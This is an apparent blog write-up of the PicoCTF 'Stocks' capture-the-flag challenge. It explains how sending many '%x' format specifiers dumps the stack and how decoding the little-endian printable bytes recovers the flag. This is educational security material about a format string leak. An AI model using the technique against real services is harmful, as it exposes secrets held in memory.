PicoCTF - Stocks [Pwn]

Stocks is a very easy pwn challenge of PicoCTF.

Instead of provide a binary file, like most of pwn challenges, Stocks provide directly the source code of the program to exploit remotely.

Analyzing the code, it is possible to notice two interesting things:

  • Inside a function there is an array of chars, called api_buf, of fixed length FLAG_BUFFER=128, that may contain the flag
api_buf[FLAG_BUFFER]
Format String Vulnerability

By exploiting the format string vulnerability, sending a huge number of “%x” as input, it is possible to dump the content of the stack and therefore also the content of the api_buf array.

Exploit

Once retrieved the content of the stack, by assuming that the content of the api_buf array is made of printable characters, it is possible to look for consecutive hexadecimal values between 0x20 and 0x7e. After finding the correct sequence of values it is possible to translate it into characters considering that in the stack, values are saved with the least significant byte in the leftmost position.

Once translated, the sequence of characters reveal the flag:

Flag

Pwned!

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
WhiteSnake

MSc in CyberSecurity at Politecnico di Milano and eJPT Junior Penetration Tester